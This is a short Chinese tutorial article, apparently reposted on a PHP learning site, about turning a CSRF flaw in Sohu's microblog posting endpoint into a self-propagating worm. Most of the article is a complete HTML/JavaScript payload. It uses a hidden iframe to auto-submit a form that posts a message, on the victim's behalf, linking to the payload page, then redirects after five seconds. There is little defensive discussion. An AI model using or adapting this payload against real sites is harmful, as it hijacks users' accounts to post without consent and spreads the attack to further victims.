来源:自学PHP网 时间:2015-04-17 10:16 作者: 阅读:次
[导读] 我们这次来看看如何利用纯CSRF来实现蠕虫攻击。问题URL: http: i sohu com a app mblog save htm?_input_encode=UTF-8 可CSRF发微博。下面来看看怎么利用通过上面的URL我构造了一个payload ,打开后先POS...
我们这次来看看如何利用纯CSRF来实现蠕虫攻击。
问题URL: http://i.sohu.com/a/app/mblog/save.htm?_input_encode=UTF-8 可CSRF发微博。下面来看看怎么利用
通过上面的URL我构造了一个payload ,打开后先POST一条微博,然后等5秒跳转到指定地址。
<meta http-equiv="content-type" content="text/html;charset=utf-8"> <h1>正在跳转...</h1> <iframe id="test_iframe" src="http://www.tianya.cn/82776194" style='display:none'> </iframe> <script> function CSRF() { test_iframe.document.write("<form id='test_form' action='http://i.sohu.com/a/app/mblog/save.htm?_input_encode=UTF-8' method='post' >" +"<input type='hidden' name='content' value='荐一个好东西 http://cnhk.ml/souhu/send.html'>" +"<input type='hidden' name='type' value='0'>" +"<input type='hidden' name='from' value='sentence'>" +"<input type='hidden' name='url' value=''>" +"</form>" +"<script>document.getElementById('test_form').submit();<\/script>" ); } CSRF(); window.setTimeout("window.location.href='http://threejs.org/'", 5000); //延迟5秒后跳转到指定网页 </script>
POST的内容为
荐一个好东西 http://cnhk.ml/souhu/send.html
这样就构成了一个CSRF蠕虫
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com